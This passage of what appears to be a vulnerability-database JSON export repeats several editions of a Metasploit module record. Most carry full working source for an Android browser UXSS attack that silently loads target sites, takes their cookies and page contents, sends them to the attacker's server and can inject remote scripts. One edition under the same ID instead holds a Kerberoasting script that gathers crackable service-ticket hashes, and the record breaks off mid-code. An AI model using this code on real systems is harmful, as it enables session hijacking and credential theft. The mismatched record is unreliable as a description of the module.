MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n 
''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: 
#{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-02-21T05:40:31", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "7ada51750c1931e0ef44c393072b2a22", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. 
Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T07:57:37", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32462", "1337DAY-ID-32461", "1337DAY-ID-32459", "1337DAY-ID-32457", "1337DAY-ID-32460", "1337DAY-ID-32456", "1337DAY-ID-32463", "1337DAY-ID-32455", "1337DAY-ID-32453", "1337DAY-ID-32452"]}, {"type": "kitploit", "idList": ["KITPLOIT:358333751727618768", "KITPLOIT:6305301433518983839"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152305"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}, {"type": "threatpost", "idList": ["THREATPOST:0B3F568CF532B4D11A2D561F09E1490F"]}, {"type": "slackware", "idList": ["SSA-2019-086-01"]}], "modified": "2019-04-02T07:57:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-04-02T07:57:37", "differentElements": ["sourceData"], "edition": 68}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "ad422f65232b8db2764fecd97e1379b3", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T09:57:18", "history": [], "viewCount": 71, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32462", "1337DAY-ID-32459", "1337DAY-ID-32461", "1337DAY-ID-32457", "1337DAY-ID-32460", "1337DAY-ID-32456", "1337DAY-ID-32463", "1337DAY-ID-32455", "1337DAY-ID-32453", "1337DAY-ID-32452"]}, {"type": "kitploit", "idList": ["KITPLOIT:358333751727618768", "KITPLOIT:6305301433518983839"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152305"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}, {"type": "threatpost", "idList": ["THREATPOST:0B3F568CF532B4D11A2D561F09E1490F"]}, {"type": "slackware", "idList": ["SSA-2019-086-01"]}], "modified": "2019-04-02T09:57:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, 
and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 
'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2019-04-02T09:57:18", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "references", "sourceHref"], "edition": 69}, {"bulletin": {"id": 
"MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-05-28T20:23:01", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32808", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806", "OPENVAS:1361412562310891805", "OPENVAS:1361412562310891802", "OPENVAS:1361412562310704452", "OPENVAS:1361412562310704451", "OPENVAS:1361412562310891804", "OPENVAS:1361412562310891803", "OPENVAS:1361412562310704450", "OPENVAS:1361412562310891801"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994259"]}], "modified": "2019-05-28T20:23:01"}}, "objectVersion": 
"1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', 
[\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def 
custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:23:01", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 70}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "18ec0cf23b5555ddd3209e9b37ae9031", "type": "metasploit", "bulletinFamily": "exploit", "title": "Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)", "description": "This module will try to find Service Principal Names that are associated with normal user accounts. Since normal accounts' passwords tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs. 
This is part of the kerberoast attack research by Tim Medin (@timmedin).\n", "published": "2018-03-16T13:11:49", "modified": "2018-08-27T21:06:07", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/CoreSecurity/impacket/blob/master/examples/GetUserSPNs.py", "https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf"], "cvelist": [], "lastseen": "2019-06-08T22:26:07", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32808", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806", "OPENVAS:1361412562310891805", "OPENVAS:1361412562310891802", "OPENVAS:1361412562310704452", "OPENVAS:1361412562310704451", "OPENVAS:1361412562310891804", "OPENVAS:1361412562310891803", "OPENVAS:1361412562310704450", "OPENVAS:1361412562310891801"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994259"]}], "modified": "2019-05-28T20:23:01"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/get_user_spns.py", "sourceData": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nfrom datetime import datetime\nfrom binascii import hexlify, unhexlify\n\n# extra modules\ndependencies_missing = False\ntry:\n from pyasn1.codec.der import decoder\n from impacket import version\n from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT\n from impacket.examples import logger\n from impacket.krb5 import constants\n from impacket.krb5.asn1 import TGS_REP\n from impacket.krb5.ccache import CCache\n 
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS\n from impacket.krb5.types import Principal\n from impacket.ldap import ldap, ldapasn1\n from impacket.smbconnection import SMBConnection\n from impacket.ntlm import compute_lmhash, compute_nthash\nexcept ImportError:\n dependencies_missing = True\n\nfrom metasploit import module\n\nmetadata = {\n 'name': 'Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)',\n 'description': '''\n This module will try to find Service Principal Names that are associated with normal user accounts.\n Since normal accounts' passwords tend to be shorter than machine accounts, and knowing that a TGS request\n will encrypt the ticket with the account the SPN is running under, this could be used for an offline\n bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.\n This is part of the kerberoast attack research by Tim Medin (@timmedin).\n ''',\n 'authors': [\n 'Alberto Solino', # impacket example\n 'Jacob Robles' # Metasploit module conversion\n ],\n 'date': '2014-09-27',\n 'license': 'CORE_LICENSE',\n 'references': [\n {'type': 'url', 'ref': 'https://github.com/CoreSecurity/impacket/blob/master/examples/GetUserSPNs.py'},\n {'type': 'url', 'ref': 'https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf'}\n ],\n 'type': 'single_scanner',\n 'options': {\n 'rhost': {'type': 'address', 'description': 'The target address', 'required': True, 'default': None},\n 'domain': {'type': 'string', 'description': 'The target Active Directory domain', 'required': True, 'default': None},\n 'user': {'type': 'string', 'description': 'Username for a domain account', 'required': True, 'default': None},\n 'pass': {'type': 'string', 'description': 'Password for the domain user account', 'required': True, 'default': None}\n },\n 'notes': {\n 'AKA': [\n 'GetUserSPNs.py',\n 
'Kerberoast'\n ]\n }}\n\nclass GetUserSPNs:\n @staticmethod\n def printTable(items, header):\n colLen = []\n for i, col in enumerate(header):\n rowMaxLen = max([len(row[i]) for row in items])\n colLen.append(max(rowMaxLen, len(col)))\n\n outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])\n\n # Print header\n module.log('{}'.format(outputFormat.format(*header)), level='good')\n module.log('{}'.format(' '.join(['-' * itemLen for itemLen in colLen])), level='good')\n\n # And now the rows\n for row in items:\n module.log('{}'.format(outputFormat.format(*row)), level='good')\n\n def __init__(self, username, password, domain, cmdLineOptions):\n self.options = cmdLineOptions\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__outputFileName = None #options.outputfile\n self.__aesKey = None #cmdLineOptions.aesKey\n self.__doKerberos = False #cmdLineOptions.k\n self.__target = None\n self.__requestTGS = True #options.request\n self.__kdcHost = cmdLineOptions['dc_ip']\n self.__saveTGS = False #cmdLineOptions.save\n self.__requestUser = None #cmdLineOptions.request_user\n #if cmdLineOptions.hashes is not None:\n # self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')\n\n # Create the baseDN\n domainParts = self.__domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n def getMachineName(self):\n if self.__kdcHost is not None:\n s = SMBConnection(self.__kdcHost, self.__kdcHost)\n else:\n s = SMBConnection(self.__domain, self.__domain)\n try:\n s.login('', '')\n except Exception:\n if s.getServerName() == '':\n raise('Error while anonymous logging into %s' % self.__domain)\n else:\n s.logoff()\n return s.getServerName()\n\n @staticmethod\n def getUnixTime(t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def getTGT(self):\n try:\n ccache = 
CCache.loadFile(os.getenv('KRB5CCNAME'))\n except:\n pass\n else:\n domain = self.__domain\n principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())\n creds = ccache.getCredential(principal)\n if creds is not None:\n TGT = creds.toTGT()\n module.log('Using TGT from cache', level='debug')\n return TGT\n else:\n module.log('No valid credentials found in cache', level='debug')\n\n # No TGT in cache, request it\n userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n # In order to maximize the probability of getting session tickets with RC4 etype, we will convert the\n # password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the\n # cleartext password.\n # If no clear text password is provided, we just go with the defaults.\n try:\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, '', self.__domain,\n compute_lmhash(password),\n compute_nthash(password), self.__aesKey,\n kdcHost=self.__kdcHost)\n except Exception, e:\n module.log('Exception for getKerberosTGT', level='error')\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,\n unhexlify(self.__lmhash),\n unhexlify(self.__nthash), self.__aesKey,\n kdcHost=self.__kdcHost)\n\n TGT = {}\n TGT['KDC_REP'] = tgt\n TGT['cipher'] = cipher\n TGT['sessionKey'] = sessionKey\n return TGT\n\n def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn):\n decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]\n\n # According to RFC4757 the cipher part is like:\n # struct EDATA {\n # struct HEADER {\n # OCTET Checksum[16];\n # OCTET Confounder[8];\n # } Header;\n # OCTET Data[0];\n # } edata;\n #\n # In short, we're interested in splitting the checksum and the rest of the encrypted data\n #\n if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.rc4_hmac.value, 
username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))\n module.log('{}'.format(entry), level='good')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))\n module.log('{}'.format(entry), level='good')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))\n module.log('{}'.format(entry), level='good')\n elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:\n entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (\n constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),\n hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))\n module.log('{}'.format(entry), level='good')\n else:\n pass\n\n\n def run(self):\n self.__target = self.__kdcHost\n\n # Connect to LDAP\n try:\n ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)\n ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n except ldap.LDAPSessionError, e:\n if str(e).find('strongerAuthRequired') >= 0:\n # We need to try SSL\n ldapConnection = 
ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)\n ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)\n else:\n raise\n\n # Building the search filter\n searchFilter = \"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)\" \\\n \"(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))\"\n\n try:\n resp = ldapConnection.search(searchFilter=searchFilter,\n attributes=['servicePrincipalName', 'sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap.LDAPSearchError, e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n module.log('sizeLimitExceeded exception caught, giving up and processing the data received', level='debug')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n else:\n raise\n\n answers = []\n module.log('Total of records returned {}'.format(len(resp)), level='info')\n\n for item in resp:\n if isinstance(item, ldapasn1.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n SPNs = []\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if attribute['type'] == 'sAMAccountName':\n if str(attribute['vals'][0]).endswith('$') is False:\n # User Account\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif attribute['type'] == 'userAccountControl':\n userAccountControl = str(attribute['vals'][0])\n elif attribute['type'] == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif attribute['type'] == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = '<never>'\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif attribute['type'] == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = '<never>'\n else:\n 
